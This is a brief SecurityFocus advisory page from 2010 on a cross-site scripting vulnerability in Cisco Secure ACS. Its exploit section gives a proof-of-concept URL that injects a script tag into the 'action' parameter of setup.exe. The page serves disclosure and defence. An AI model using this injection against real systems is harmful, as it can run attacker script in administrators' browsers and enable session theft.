info
discussion
exploit
solution
references
Cisco Secure ACS Cross-site Scripting Vulnerability
http://example.com:dyn_port/setup.exe?action=<script>alert('foo+bar')</script>&page=list_users&user=P*
Privacy Statement
Copyright 2010, SecurityFocus